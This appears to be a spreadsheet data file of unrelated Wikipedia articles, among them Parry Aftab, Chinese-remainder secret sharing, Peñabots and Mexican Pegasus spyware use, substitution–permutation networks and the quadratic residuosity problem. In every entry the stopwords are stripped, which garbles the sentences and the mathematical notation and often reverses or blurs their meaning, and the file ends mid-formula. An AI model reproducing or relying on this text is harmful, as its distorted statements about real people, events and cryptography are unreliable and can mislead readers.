"marketing managing nation branding prolonged crisis: case israel". place branding public diplomacy. (3): 202–212. doi:10.1057/pb.2009.15. s2cid 154880514. retrieved october 2021. cummings, jonathan (2016). israel's public diplomacy: problems hasbara, 1966-1975. london: rowman littlefield publishers. isbn 978-1-4422-6598-1. dart, (2016). "'brand israel': hasbara israeli sport". sports society. (10): 1402–1418. doi:10.1080/17430437.2015.1133595. s2cid 147689077. retrieved october 2021. gilboa, eytan; shai, nachman (2011). "rebuilding public diplomacy case israel". fisher, ali; scott, scott (eds.). trials engagement future public diplomacy. brill-nijhoff. 33–54. isbn 9789047441755. gilboa, eytan (2013). "public diplomacy missing component israel's foreign policy". inbar, efraim (ed.). israel's strategic agenda. routledge. 102–134. isbn 9780415495196. goodman, giora september 2017). "explaining occupation: israeli hasbara occupied territories aftermath june 1967 war". journal israeli history. (1): 71–93. doi:10.1080/13531042.2017.1366716. s2cid 159708295. retrieved october 2021. hirschberger, bernd (2021). external communication social media during asymmetric conflicts theoretical model empirical case study conflict israel palestine. bielefeld: transcript verlag. isbn 978-3-8394-5509-8. retrieved october 2021. mearsheimer, john; walt, stephen (2007). israel lobby u.s. foreign policy. york: farrar, straus giroux. isbn 9780374177720. schleifer, (2003). "jewish contemporary origins israeli hasbara". jewish political studies review. (1–2): 125–153. jstor 25834565. retrieved october 2021. shai, nachman (2018). hearts minds: israel battle public opinion. albany, york: state university york press. isbn 9781438469058. retrieved october 2021. also references external links israel students defend online, usatoday, 2013 occupation american mind, jazeera english, 2017</t>
  </si>
  <si>
    <t>Header check sequence</t>
  </si>
  <si>
    <t>header check sequence (hcs) error checking feature various header data structures, media access control (mac) header ethernet. consist cyclic redundancy check (crc) frame, obtained remainder division (modulo generator polynomial multiplied content header excluding field. octet long, wimax, 16-bit value cable modems. also checksum references</t>
  </si>
  <si>
    <t>Parry Aftab</t>
  </si>
  <si>
    <t>parry aftab internet privacy security lawyer, considered founders cyberlaw founder world's largest oldest cybersafety charity. named boston herald "the leading expert cybercrime world," aftab wrote first cybersafety book world parents 1996) received long list honors appointed boards directors advisory boards several companies, including truste, facebook, sesame street online. longtime internet safety expert founded internet safety organization wiredsafety, stopcyberbullying consulting firm, wiredtrust. "the privacy lawyer" columnist information week magazine many years. 2016 parry aftab founded cybersafety india stopcyberbullying sextortion morphing prevention initiatives india. resides canada. career aftab appointed unesco's director general federico mayor chief u.s. national action committee unesco's world citizen's committee protecting innocence danger group 1999 address online sexual exploitation children. became member board directors non-profit, truste 2003. 2005, united states congress issued resolution recognized efforts combat cyberbullying executive director stopcyberbullying wiredsafety.her organization, wiredsafety, became member facebook's safety advisory board 2009 april, aftab appeared good morning america town hall meeting sexting. 2010 received director's community leadership award members online safety technology working group national telecommunications information administration. members internet safety technical task force, harvard's berkman center.she co-recipient rcmp's child recovery award 2011. aftab organizer 2015 anti-cyberbullying event ireland, member advisory boards mtv's thin line, fair play, sesame street online council. clients included facebook, disney nickelodeon. quoted 1500 news magazine articles testified many times congress canadian parliament digital policy issues. reception members radical internet groups disagree anti-cyberbullying campaigns "launched massive internet harassment campaign" her. 2010, forced cancel good morning america appearance (where would discussing cyberbullying campaign jessi slaughter members 4chan's board) targeted harassment, included google bombing baseless accusations child molestation aftab. july 2011 detractors incited swatting incident home contacted police claiming house site murders hostages. aftab vacation time local police swat team investigated false claims.according british blogger katie jones, aftab tried coerce releasing control domain, katie.com, also name newly published book, katie.com: story. jones refused wrote incident website. publications child abuse internet. ending silence, carlos arnaldo, ed., chapter "the technical response: blocking, filtering rating internet", 135–140 (2001) isbn 92-3-103728-5 isbn 978-9231037283 inocencia peligro conviva hijos protéjalos cuando naveguen internet (2001) isbn 970-10-3297-7 isbn 978-9701032978 parent's guide protecting your children cyberspace (1999) isbn 0-07-135752-1 isbn 978-0071357524 parents guide internet: protect your children cyberspace (1997) isbn 0-9660491-0-1 isbn 978-0966049107 parent's guide internet edition (2000) isbn 0077096746 isbn 978-0077096748 ciberbullying, guia practica spain/espana (2004) isbn 84-9726-336-7 internet menores riesgos. guía práctica para madres padres spain/espana (2003) isbn 84-9726-310-3 references external links aftab's site</t>
  </si>
  <si>
    <t>Secret sharing using the Chinese remainder theorem</t>
  </si>
  <si>
    <t>secret sharing consists recovering secret shares, containing partial information secret. chinese remainder theorem (crt) states given system simultaneous congruence equations, solution unique z/nz, appropriate conditions congruences. secret sharing thus produce shares presented congruence equations secret could recovered solving system congruences unique solution, secret recover. secret sharing schemes: several types there several types secret sharing schemes. basic types so-called threshold schemes, cardinality shares matters. words, given secret shares, shares smallest cardinality secret recovered, sense shares enough give this known threshold access structure. call schemes (t,n) threshold secret sharing schemes, t-out-of-n scheme. threshold secret sharing schemes differ another method generating shares, starting certain secret. first ones shamir's threshold secret sharing scheme, based polynomial interpolation order find given shares, george blakley's geometric secret sharing scheme, uses geometric methods recover secret threshold secret sharing schemes based mignotte asmuth-bloom, special sequences integers along crt. chinese remainder theorem {\displaystyle k\geqslant 2,m_{1},...,m_{k}\geqslant {\displaystyle b_{1},...,b_{k}\in \mathbf system congruences {\displaystyle {\begin{cases}x\equiv &amp;b_{1}\ {\bmod }}m_{1}\\&amp;\vdots \\x\equiv &amp;b_{k}\ {\bmod }}m_{k}\\\end{cases}}} solutions {\displaystyle b_{i}\equiv b_{j}{\bmod {(}}m_{i},m_{j})} {\displaystyle 1\leqslant i,j\leqslant {\displaystyle (m_{i},m_{j})} denotes greatest common divisor (gcd) furthermore, conditions, system unique solution z/nz {\displaystyle n=[m_{1},...,m_{k}]} denotes least common multiple (lcm) {\displaystyle m_{1},...,m_{k}} secret sharing using since chinese remainder theorem provides method uniquely determine number modulo k-many relatively prime integers {\displaystyle m_{1},m_{2},...,m_{k}} given {\displaystyle s&lt;\prod _{i=1}^{k}m_{i}} then, idea construct scheme determine secret given shares case, remainder modulo numbers mi), reveal secret given less shares. ultimately, choose relatively prime integers {\displaystyle m_{1}&lt;m_{2}&lt;...&lt;m_{n}} smaller product choice integers, time greater choice them. then shares {\displaystyle s_{1},s_{2},...,s_{n}} defined {\displaystyle s_{i}=s{\bmod }}m_{i}} {\displaystyle i=1,2,...,n} manner, thanks crt, uniquely determine shares, less this provides so-called threshold access structure. this condition also regarded {\displaystyle \prod _{i=n-k+2}^{n}m_{i}&lt;s&lt;\prod _{i=1}^{k}m_{i}.} since smaller smallest product integers, smaller product them. also, greater product greatest integers, greater product them. there secret sharing schemes utilize essentially idea, mignotte's asmuth-bloom's schemes, explained below. mignotte's threshold secret sharing scheme said before, mignotte's threshold secret sharing scheme uses, along crt, special sequences integers called (k,n)-mignotte sequences consist integers, pairwise coprime, product smallest greater product biggest ones. this condition crucial scheme built choosing secret integer products, condition ensures least shares needed fully recover secret, matter chosen. formally, integers. (k,n)-mignotte sequence strictly increasing sequence positive integers {\displaystyle m_{1}&lt;\cdots &lt;m_{n}} {\displaystyle (m_{i},m_{j})=1} {\displaystyle m_{n-k+2}\cdots m_{n}&lt;m_{1}\cdots m_{k}} call range authorized range. build (k,n)-threshold secret sharing scheme follows: choose secret random integer authorized range. compute, every reduction modulo call shares. now, different shares {\displaystyle s_{i_{1}},\ldots ,s_{i_{k}}} consider system congruences: {\displaystyle {\begin{cases}x\equiv &amp;s_{i_{1}}\ {\bmod }}m_{i_{1}}\\&amp;\vdots \\x\equiv &amp;s_{i_{k}}\ {\bmod }}m_{i_{k}}\\\end{cases}}} chinese remainder theorem, since {\displaystyle m_{i_{1}},\ldots ,m_{i_{k}}} pairwise coprime, system unique solution modulo {\displaystyle m_{i_{1}}\cdots m_{i_{k}}} construction shares, solution nothing secret recover. asmuth-bloom's threshold secret sharing scheme this scheme also uses special sequences integers. integers. consider sequence pairwise coprime positive integers {\displaystyle m_{0}&lt;...&lt;m_{n}} {\displaystyle m_{0}.m_{n-k+2}...m_{n}&lt;m_{1}...m_{k}} given sequence, choose secret random integer z/m0z. pick random integer {\displaystyle s+\alpha \cdot m_{0}&lt;m_{1}...m_{k}} compute reduction modulo {\displaystyle s+\alpha \cdot m_{0}} shares {\displaystyle i_{i}=(s_{i},m_{i})} now, different shares {\displaystyle i_{i_{1}},...,i_{i_{k}}} consider system congruences: {\displaystyle {\begin{cases}x\equiv &amp;s_{i_{1}}\ {\bmod }}m_{i_{1}}\\&amp;\vdots \\x\equiv &amp;s_{i_{k}}\ {\bmod }}m_{i_{k}}\\\end{cases}}} chinese remainder theorem, since {\displaystyle m_{i_{1}},...,m_{i_{k}}} pairwise coprime, system unique solution modulo {\displaystyle m_{i_{1}}...m_{i_{k}}} construction shares, secret reduction modulo important notice mignotte (k,n)-threshold secret-sharing scheme perfect sense less shares contains information secret. asmuth-bloom scheme perfect: independent secret {\displaystyle \left.{\begin{array}{r}\prod _{i=n-k+2}^{n}m_{i}\\\alpha \end{array}}\right\}&lt;{\frac {\prod _{i=1}^{k}m_{i}}{m_{0}}}} therefore integer modulo {\displaystyle \prod _{i=n-k+2}^{n}m_{i}.} this product moduli largest choose possible products, therefore subset equivalences integer modulo product, information leaked. example following example asmuth-bloom's scheme. practical purposes choose small values parameters. choose n=4. pairwise coprime integers {\displaystyle m_{0}=3,m_{1}=11,m_{2}=13,m_{3}=17} {\displaystyle m_{4}=19} they satisfy asmuth-bloom required sequence {\displaystyle 3\cdot 17\cdot 19&lt;11\cdot 13\cdot secret pick {\displaystyle \alpha =51} satisfying required condition asmuth-bloom scheme. then {\displaystyle 2+51\cdot 3=155} compute shares integers they respectively consider possible shares: among possible sets shares take {1,12,2} show recovers secret s=2. consider following system congruences: {\displaystyle {\begin{cases}x\equiv {\bmod }}11\\x\equiv &amp;12\ {\bmod }}13\\x\equiv {\bmod }}17\\\end{cases}}} solve system, {\displaystyle m=11\cdot 13\cdot from constructive algorithm solving system, know solution system {\displaystyle x_{0}=1\cdot e_{1}+12\cdot e_{2}+2\cdot e_{3}} found follows: bézout's identity, since {\displaystyle (m_{i},m/m_{i})=1} exist positive integers found using extended euclidean algorithm, {\displaystyle r_{i}.m_{i}+s_{i}.m/m_{i}=1} {\displaystyle e_{i}=s_{i}\cdot m/m_{i}} from identities {\displaystyle 1=1\cdot 221-20\cdot 11=(-5)\cdot 187+72\cdot 13=5\cdot 143+(-42)\cdot {\displaystyle e_{1}=221,e_{2}=-935,e_{3}=715} unique solution modulo {\displaystyle 11\cdot 13\cdot 155. finally, {\displaystyle s=155\equiv 2\mod also secret sharing shamir's secret sharing scheme chinese remainder theorem access structure references oded goldreich, dana madhu sudan, chinese remaindering errors, ieee transactions information theory, vol. july 2000, pages 1330-1338. mignotte (1983) share secret. beth (eds) cryptography. eurocrypt 1982. lecture notes computer science, 149. springer, berlin, heidelberg. c.a. asmuth bloom. modular approach safeguarding. ieee transactions information theory, it-29(2):208-210, 1983. sorin iftene. general secret sharing based chinese remainder theorem applications e-voting. electronic notes theoretical computer science (entcs). volume 186, (july 2007). pages 67–84. year publication: 2007. issn 1571-0661. thomas cormen, charles leiserson, ronald rivest, clifford stein. introduction algorithms, second edition. press mcgraw-hill, 2001. isbn 0-262-03293-7. section 31.5: chinese remainder theorem, pages 873-876. ronald cramer. basic secret sharing (lectures 1-2), class notes. october 2008, version 1.1. external links https://web.archive.org/web/20091209071915/http://www.cryptolounge.org/wiki/ronald_cramer</t>
  </si>
  <si>
    <t>Geometric cryptography</t>
  </si>
  <si>
    <t>geometric cryptography area cryptology messages ciphertexts represented geometric quantities angles intervals computations performed ruler compass constructions. difficulty impossibility solving certain geometric problems like trisection angle using ruler compass basis various protocols geometric cryptography. this field study suggested mike burmester, ronald rivest shamir 1996. though cryptographic methods based geometry practically real life applications, pedagogic tools elucidation complex cryptographic protocols. geometric one-way function some geometric cryptographic methods based impossibility trisecting angle using ruler compass. given arbitrary angle, straightforward ruler compass construction finding triple given angle. ruler compass construction finding angle exact one-third arbitrary angle. hence function assigns triple angle given angle thought one-way function, constructions allowed ruler compass constructions. geometric identification protocol geometric identification protocol suggested based one-way function indicated above. assume alice wishes establish means proving identity later bob. initialization: alice publishes copy angle constructed alice triple angle constructed random. because trisecting angle impossible alice confident knows identification protocol: alice gives copy angle constructed triple angle selected random. flips coin tells alice result. says "heads" alice gives copy angle checks says "tails" alice gives copy angle checks ya.the four steps repeated times independently. accepts alice's proof identity checks successful. this protocol interactive proof knowledge angle (the identity alice) error 2−t. protocol also zero-knowledge. references</t>
  </si>
  <si>
    <t>Pan–tilt–zoom camera</t>
  </si>
  <si>
    <t>pan–tilt–zoom camera (ptz camera) camera capable remote directional zoom control. television production, controls used professional video cameras television studios, sporting events, spaces. they commonly referred robos, abbreviation robotic camera. these systems remotely controlled automation systems. abbreviation pan, tilt zoom reflects movement options camera. other types cameras eptz virtual pan-tilt-zoom (vptz) high-resolution camera digitally zooms pans portions image, physical camera movement. ultra-low bandwidth surveillance streaming technologies vptz stream user-defined areas higher quality without increasing overall bandwidth usage. cameras commonly used applications surveillance, video conferencing, live production, lecture capture distance learning. auto tracking some cameras ability detect movement within field view. this used move camera keep target center video frame. once target exits camera's field view, camera returns pre-programmed position movement detected. video surveillance pan–tilt–zoom cameras essential part modern surveillance systems. they direct attention suspicious events. unlike fixed cameras, cameras give operator ability physically move camera remotely survey another area. video conferencing eptz cameras increased popularity increase videotelephony usage. electronic virtual pan, tilt, zoom allowed presenters users webcams hands-free. also (camera), pan–tilt–zoom camera encased globe obscures pointing camera list camera types references</t>
  </si>
  <si>
    <t>Peñabot</t>
  </si>
  <si>
    <t>peñabots nickname automated social media accounts allegedly used mexican government enrique peña nieto political party keep unfavorable news reaching mexican public. peñabot accusations related broader issue fake news 21st century. history disinformation mexican politics political party reported fake news since peña nieto. main tactic originally spread propaganda open radio television networks. such tactic effective mexico, newspaper readership cable largely limited middle classes; consequently, country's major television networks televisa azteca exert significant influence national politics. televisa itself, owns around two-thirds programming mexico's channels, making mexico's largest television network, also largest media network spanish-speaking world. peñabots analysts given name peñabots suspected network automated accounts social media used mexican government spread pro-government propaganda marginalize dissenting opinions social media. bots first noticed 2012 elections used disseminate opinions support enrique peña nieto social networks social networks twitter facebook. according aristegui noticias, usage goes articles mexican constitution, ones used current government cost estimated million pesos monthly fee, news outlets argument helps government spread fake support towards president, benefit towards mexican people (with highly unpopular). facebook currently holds approximately 640,321 peñabots, twitter less. july 2017, oxford university’s computational propaganda research project claimed many western democracies, mexico included, perform social media manipulation, thus saying manipulation comes directly mexican government itself.during peña nieto's subsequent presidency, analysts noted peñabots used overpower trending topics critique government, flood trending government critical hashtags spam, create fake trends pushing alternative hashtags, push smear campaigns threats government critical activists journalists. peñabots distinguished pattern activity distinct normal interaction activity social networks. meadebots twitter reported followers 2018 presidential candidate jose antonio meade bots. when antonio meade presented candidate 2018 presidential election, social media accounts "@movimientomeade" (created pri's official account @pri_nacional), obtained huge quantity followers quick. some users noticed brought attention, investigations reported followers bots (702,000 747,000), account eliminated twitter hours. fake accounts used hashtags #yoconmeade #meade18, revealed meade's official account twitter, @joseameadek bots (216,000 fake followers 981,000). manipulation news media mexico, television mexican government peña nieto accused using various means keep unfavorable news reaching mexican people. many mexicans protested practice clearly goes freedom speech. reported fake news since peña nieto. main tactic spread propaganda radio television. this tactic perceived effective mexico, newspaper readership research internet cable largely limited middle classes; consequently, country's major television networks televisa azteca exert significant influence national politics. televisa itself, owns around two-thirds programming mexico's channels, making mexico's largest television network, also largest media network spanish-speaking world.in june 2012, 2012 mexican presidential elections, british newspaper guardian published series allegations claiming televisa, sold favorable coverage politicians news entertainment shows, scandal became known televisa controversy. documents published 'the guardian alleged secretive circle within televisa manipulated news coverage favor presidential candidate enrique peña nieto, poised favorite win. televisa's secret circle supposedly commissioned videos promote peña nieto lash political rivals 2009. guardian documents suggest televisa's secret team distributed videos e-mail, posting posted facebook youtube, still seen there. another document powerpoint presentation, slide explicitly aimed rival leftist candidate party democratic revolution (prd), andrés manuel lópez obrador. supposedly given guardian televisa employee. document's authenticity never possible confirm– however dates, names, events largely coincide. televisa refused talk documents, denied relationship presidential candidate, saying provided equal media coverage parties. televisa published article supposedly showing discrepancies guardian documents denying accusations.mexican citizens complained perceived favoritism towards enrique peña nieto pri, protesting movement televisa covered detail. however, televisa's news media coverage perceived biased, using media coverage tactic mexican citizens call cortinas humo (smoke screens). these introduce news scandal giving extensive coverage distract citizens potential conflict-of-interest controversy could damage image politician favored network. example perceived smoke screen would news media coverage "caso michoacán" "caso paolette" distracting attention parallel 132" movement. years later, september 2016; factual evidence televisa's performing media manipulation emerged, televisa news anchor live-on reading teleprompter, mistakenly read loud "try jaime bronco" rodríguez calderón (nuevo leon's governor) mentioned little possible". newspaper universal caught video published social media. televisa mention story declined comment. lack news coverage concerning nuevo león's governor jaime rodriguez, perceived first elected governor part political party (independent governor), unlike governors preceding him, independent governor bronco" spend money publicity all, preferring communicate news using social media twitter facebook. while incident proven televisa's bias, anything incriminate political party enrique peña nieto, though suspicion televisa manipulating news media. contrast, december 2017 article york times, reported enrique peña nieto spending 2000 million dollars publicity, first years president, largest publicity budget ever spent mexican president. additionally, percent news journalists admitted believe enough freedom speech, award-winning news reporter carmen aristegui controversially fired shortly revealing mexican white house scandals. violence spying towards news journalists civil rights activists receiving accusations spreading fake news, mexican government also accused violence towards news journalists, spying them, also towards civil right leaders families. during tenure president, peña nieto accused failing protect news journalists, whose deaths speculated politically triggered, politicians attempting prevent covering political scandals. york times published news report matter titled, mexico easy kill journalist", mentioning epn's government, mexico became worst countries journalist. assassination journalist javier valdez 2017, received national coverage, multiple news journalists asking "real protection", well freedom speech. president announced "deeply wounded" death, despite mexican citizens, well political party opposition perceived, presidential words hypocritical, outlook look favorable mexico already leading country journalist killed 2017, assassinations.on june 2017, york times conjunction news reporter carmen aristegui, even backed televisa news reporter carlos loret mola, reported mexican government uses spyware software known pegasus, targets mexican news reporters (and families) civil rights leaders (and families) using text messages lures. since 2011, mexican government invested million worth spyware. pegasus spyware infiltrates persons cellphone reports every detail messages, e-mails, contacts calendars. after revelation, israeli manufacturer pegasus spyware, group, re-stated sold technology governments 'explicit agreement', technology meant 'only combat organized crime' spying although sells software cannot control basically leaves government's monitor abusing software. york times independent forensic analysts analyzed data 'dozens messages', multiple times proving accusation, commented espionage towards news journalists civil rights leaders, effort mexican government thwart battle corruption infecting every limb mexican society', highly unlikely would espionage receive 'judicial approval'. edward snowden worked government's revealing citizens, also said evidence points mexican government spy, twitter said crime public".the hacking attempts 'highly personalized' target, would consist sending text messages attached link, spyware enter users smartphone, needed smartphone owner click link. news reporter carmen aristegui, previously 2014, revealed conflict interest regarding president ownership mexican "casa blanca (white house)" unfairly fired airing investigation, herself, received hacking attempts, journalist found targeted, attempts disguised message sent american embassy mexico, trying help problem visa; additionally aristegui's emilio aristegui received attempts months despite under-age 16-year-old teen. news media perceived attempts aristegui revenge mexican government. news reporter carlos loret mora received attempts. while, juan pardinas, director mexican institute competitiveness, also received multiple attempts told guns outside house another contact list invited father funeral saying "close friend", attempt wife went claiming padilla extramarital affair, could evidence clicked link. also, parents, protesters major leaders investigations "ayotzinapa, students massacre" received spyware messages, "women atenco" scandal directly tied enrique peña nieto's time governor state mexico).the york times article contained picture epn.on june 2017, after. opposition political party, national action party (pan) denounced mexican government inter-american commission human rights suspicions violations towards human rights requested them, lead investigation citing spying causes violations towards article 16th mexican constitution, well violating article 11th universal declaration human rights. while, response accusations, peña nieto made public technology bought indeed used mexican government, denied misuses, stated used protect mexicans searching criminal saying "also felt spied upon, nothing fake blaming (mexican) government", proof"; saying ordered investigation hoped "under law, applied raised false accusations government.", last part quote making journalist hacking victims feel threatened. which forced mexican president call writer article azam ahmed tell him, menacing him. however, previous presidential scandals, peña nieto words lacked credibility mexicans, journalist like jorge ramos complaining enrique peña nieto remains power despite illegal actions. later political rival andrés manuel lópez obrador (amlo) competed presidency 2012 intends compete 2018 candidate morena political party, also revealed among hacking targets, also target. june 2017, national human rights commission (mexico) opened case regarding government espionage.as february 2018, reuters published article stating mexican government properly investigated pegasus spyware usage news journalists. andrés sepúlveda claims hacking mexican presidential election, 2012 march 2016, article published magazine bloomberg business week colombian, hacker named andrés sepúlveda claimed paid $600,000 pesos, "institutional revolutionary party (pri)" hacking files (including phone calls, e-mails strategies) pertaining peña nieto's rivals respective political campaigns, also manipulate social media create fake news opponents 30,000 fakes twitter accounts helped create fake trending topics, perception public enthusiasm towards peña nieto's 2012 presidential campaign. election claims watching live feed bogota, colombia start destroying evidence (usbs, cellphones, computers) right peña nieto declared winner. said helped team hackers, led. also claims helped hack elections latin american countries including nicaragua, panama, honduras, salvador, colombia, costa rica, guatemala venezuela, said mexican operation "the complex far". hacker 10-year prison sentence confessing proving crimes helping campaign ivan zuloagawithin native colombia. while juan josé rendón sepúlveda describes accomplice proved guilty still remains free. national action party (pan) requested investigation, 2016, consejo general instituto nacional electoral (general council national electoral institute) discarded investigation describing "frivolous" based single journalistic note. presidential counselor ciro murayama said enough evidence lead investigation, would promoting unjustified investigations, leading sourness political parties. influence perceived media manipulation news mexican popular culture controversies regarding perceived televisa news media coverage favor pri, spreading fake news mexican government, influenced mexican popular culture. director writer luis estrada released black-comedy film perfect dictatorship (2014), based perceived media manipulation mexico. mexico tightly controlled media landscape, plot centered corrupt politician fictional stand-in enrique peña nieto) political party (serving fictional stand-in pri), makes deal (which serves stand-in televisa) manipulate diffusion news towards benefit, order save political career. references</t>
  </si>
  <si>
    <t>Substitution–permutation network</t>
  </si>
  <si>
    <t>cryptography, sp-network, substitution–permutation network (spn), series linked mathematical operations used block cipher algorithms (rijndael), 3-way, kalyna, kuznyechik, present, safer, shark, square. such network takes block plaintext inputs, applies several alternating rounds layers substitution boxes (s-boxes) permutation boxes (p-boxes) produce ciphertext block. s-boxes p-boxes transform (sub-)blocks input bits output bits. common transformations operations efficient perform hardware, exclusive (xor) bitwise rotation. introduced round, usually form "round keys" derived designs, s-boxes depend key.) decryption done simply reversing process (using inverses s-boxes p-boxes applying round keys reversed order). components s-box substitutes small block bits (the input s-box) another block bits (the output s-box). this substitution one-to-one, ensure invertibility (hence decryption). particular, length output length input (the picture right s-boxes input output bits), different s-boxes general could also change length, data encryption standard (des), example. s-box usually simply permutation bits. rather, good s-box property changing input change half output bits avalanche effect). also property output depend every input bit. p-box permutation bits: takes outputs s-boxes round, permutes bits, feeds s-boxes next round. good p-box property output bits s-box distributed many s-box inputs possible. round, round (obtained simple operations, instance, using s-boxes p-boxes) combined using group operation, typically xor. properties single typical s-box single p-box alone much cryptographic strength: s-box could thought substitution cipher, p-box could thought transposition cipher. however, well-designed network several alternating rounds p-boxes already satisfies shannon's confusion diffusion properties: reason diffusion following: changes plaintext, s-box, whose output change several bits, changes distributed p-box among several s-boxes, hence outputs s-boxes changed several bits, doing several rounds, changes several times back forth, therefore, end, ciphertext changed completely, pseudorandom manner. particular, randomly chosen input block, flips i-th bit, probability j-th output change approximately half, strict avalanche criterion. vice versa, changes ciphertext, attempts decrypt result message completely different original plaintext—sp ciphers easily malleable. reason confusion exactly diffusion: changing changes several round keys, every change every round diffuses bits, changing ciphertext complex manner. attacker somehow obtains plaintext corresponding ciphertext—a known-plaintext attack, worse, chosen plaintext chosen-ciphertext attack—the confusion diffusion make difficult attacker recover key. performance although feistel network uses s-boxes (such des) quite similar networks, differences make either applicable certain situations. given amount confusion diffusion, network "inherent parallelism" given many execution units computed faster feistel network. cpus execution units smart cards cannot take advantage inherent parallelism. also ciphers require s-boxes invertible perform decryption); feistel inner functions restriction constructed one-way functions. also feistel network product cipher square (cipher) international data encryption algorithm references further reading katz, jonathan; lindell, yehuda (2007). introduction modern cryptography. press. isbn 9781584885511. stinson, douglas (2006). cryptography. theory practice (third ed.). chapman hall/crc. isbn 1584885084.</t>
  </si>
  <si>
    <t>Subject-matter expert Turing test</t>
  </si>
  <si>
    <t>subject matter expert turing test variation turing test computer system attempts replicate expert given field chemistry marketing. also known feigenbaum test proposed edward feigenbaum 2003 paper.the concept also described kurzweil 2005 book singularity near. kurzweil argues machines pass test inevitable consequence moore's law. also subject-matter expert authority particular area topic turing test test machine's ability exhibit intelligent behavior equivalent human progress artificial intelligence notes references feigenbaum, edward (2003). "some challenges grand challenges computational intelligence". journal acm. (1): 32–40. doi:10.1145/602382.602400. s2cid 15379263. kurzweil, (2005). singularity near. penguin books. isbn 0-670-03384-7. mccorduck, pamela (2004), machines think (2nd ed.), natick, peters, ltd., isbn 1-56881-205-1, 503-505 further reading harel, david (2005). turing-like test biological modeling". nature biotechnology. (4): 495–496. doi:10.1038/nbt0405-495. pmid 15815679. s2cid 34517208.</t>
  </si>
  <si>
    <t>Fürstenberg (Havel) station</t>
  </si>
  <si>
    <t>fürstenberg (havel) station (german: bahnhof fürstenberg (havel)) railway station municipality fürstenberg/havel, located oberhavel district brandenburg, germany. sold station building station building shown picture sold private individual. hosts: rental space e.g. workshops former waiting hall woodworking shop verstehbahnhof makerspace:this makerspace primarily directed towards school groups. also has: 3d-printers lasercutters jugend hackt (youth hacking organization) headquarters references</t>
  </si>
  <si>
    <t>Scary Stories: Dark Web</t>
  </si>
  <si>
    <t>scary stories: dark 2020 supernatural horror anthology directed bryan renaud produced random acts, written renaud additional material savanna crystal skillman. originally developed live performance, production reimagined film, beginning production march 2020, similar pandemic-era film host. film notable serves anthology unconnected shorts, described plot found dark web. story follows group friends (savanna rae, bryan renaud, shannon leigh webber, sarah patin, locke, alexandra alontaga) unleash long-dormant demon stumbling dark web. addition zoom call, found footage formats used film include phone video, documentary footage, live streaming. film premiered demand october 2020, originally limited four-week run. after becoming best-selling production random acts' history, extended november 2020 eventually streaming youtube. plot after finding mysterious book stories attic, college student chloe whitaker (savanna rae) gathers friends video call reignite ancient storytelling tradition called "the moonlight order." tells story sara bogan, remembered boogeywoman, lived tortured life found solace sharing stories. chloe includes footage located dark web, unwittingly unleashing dark force upon call targets friend group one...but could sara bogan herself? after jenny (shannon leigh webber) alyssa (alexandra alontaga) disappear call, michael (bryan renaud) heads foot chloe's house. found footage segments interspersed main plot include queer tinder date gone wrong ("date hell"), haunted bridge ("emily's bridge"), woman followed ("selfy"), documentary footage ("the pittsford haunted house"). "emily's bridge" "the pittsford haunted house" previously featured anthology entitled dead static. michael runs city, dark force overtakes call reveals footage chloe participating ritual, becoming possessed. friends (sarah patin locke) attempt stop him, michael arrives chloe's house finds hundreds candles ceremony, chloe nowhere found. ritual required ceremony six, completed human sacrifice. finally, michael enter chloe's screen call attacked chloe, posessed sara bogan. chloe calmly collects "the moonlight order" book walks towards camera call runs time. despite similarities host (2020), film based 2019 theatrical play scary stories: afraid?, entered production host (2020) premiered. cast savanna chloe whitaker bryan renaud michael shannon leigh webber jenny sarah patin sheena alexandra alontaga alyssa locke tony todd himself (uncredited) colton adams gardy gilbert dana macel girl production 2016, random acts began developing stage comedy inspired afraid dark?. early 2019, savanna joined production assisted rewrite changed overall tone straight horror comedic elements. live production entitled scary stories: afraid? played sold-out otherworld theatre chicago throughout october november 2019.faced canceling almost events planned 2020, renaud (along writer crystal skillman) re-adapted story present day, pandemic. after private screening september 2020, writers quickly devised scene connect majority film final moments, completing reshoots days premiere. exal iraheta, wrote "date hell" segment, spoke chicago reader writing pandemic-era project telling scary stories online. states, story trying meet someone online. think speaks loneliness we’re experiencing quarantine...there’s like hovering need connect, you’re left asking much sometimes: really meeting talking side screen?" iraheta previously written segment 2019 production well.chicago tribune announced official cast september 2020. release scary stories: dark became available 24-hour rental october 2020. originally limited event close halloween, film broke previous records random acts, prompting extension november 2020. home media july 2021, film posted entirety youtube. october 2021, stories featured film adapted scary stories around fire podcast. 2022, random acts posted teaser trailer viral: scary story planned halloween release. reception fred's horror corner gave film 3.5/5 stars, calling "believable host vhs."chicago reader recommended scary stories: dark web, stating "send good kind creepy shiver spine." references</t>
  </si>
  <si>
    <t>Quadratic residuosity problem</t>
  </si>
  <si>
    <t>quadratic residuosity problem (qrp) computational number theory decide, given integers {\displaystyle {\displaystyle whether {\displaystyle quadratic residue modulo {\displaystyle not. here {\displaystyle n=p_{1}p_{2}} unknown primes {\displaystyle p_{1}} {\displaystyle p_{2}} {\displaystyle among numbers obviously quadratic non-residues (see below). problem first described gauss disquisitiones arithmeticae 1801. this problem believed computationally difficult. several cryptographic methods rely hardness, applications. efficient algorithm quadratic residuosity problem immediately implies efficient algorithms number theoretic problems, deciding whether composite {\displaystyle unknown factorization product primes. precise formulation given integers {\displaystyle {\displaystyle {\displaystyle said quadratic residue modulo {\displaystyle exists integer {\displaystyle {\displaystyle a\equiv b^{2}{\pmod {t}}} .otherwise quadratic non-residue. when {\displaystyle t=p} prime, customary legendre symbol: quadratic residue modulo quadratic non-residue modulo {\displaystyle \left({\frac {a}{p}}\right)={\begin{cases}1&amp;{\text{ }}a{\text{ quadratic residue modulo }}p{\text{ }}a\not \equiv 0{\pmod {p}},\\-1&amp;{\text{ }}a{\text{ quadratic non-residue modulo }}p,\\0&amp;{\text{ }}a\equiv 0{\pmod {p}}.\end{cases}}} this multiplicative character means {\displaystyle {\big (}{\tfrac {a}{p}}{\big )}=1} exactly {\displaystyle (p-1)/2} values {\displaystyle 1,\ldots ,p-1} {\displaystyle remaining. easy compute using quadratic reciprocity manner akin euclidean algorithm, legendre symbol. consider given {\displaystyle n=p_{1}p_{2}} {\displaystyle p_{1}} {\displaystyle p_{2}} two, different unknown primes. given {\displaystyle quadratic residue modulo {\displaystyle {\displaystyle quadratic residue modulo {\displaystyle p_{1}} {\displaystyle p_{2}} since know {\displaystyle p_{1}} {\displaystyle p_{2}} cannot compute {\displaystyle {\big (}{\tfrac {a}{p_{1}}}{\big {\displaystyle {\big (}{\tfrac {a}{p_{2}}}{\big however, easy compute product. this known jacobi symbol: {\displaystyle \left({\frac {a}{n}}\right)=\left({\frac {a}{p_{1}}}\right)\left({\frac 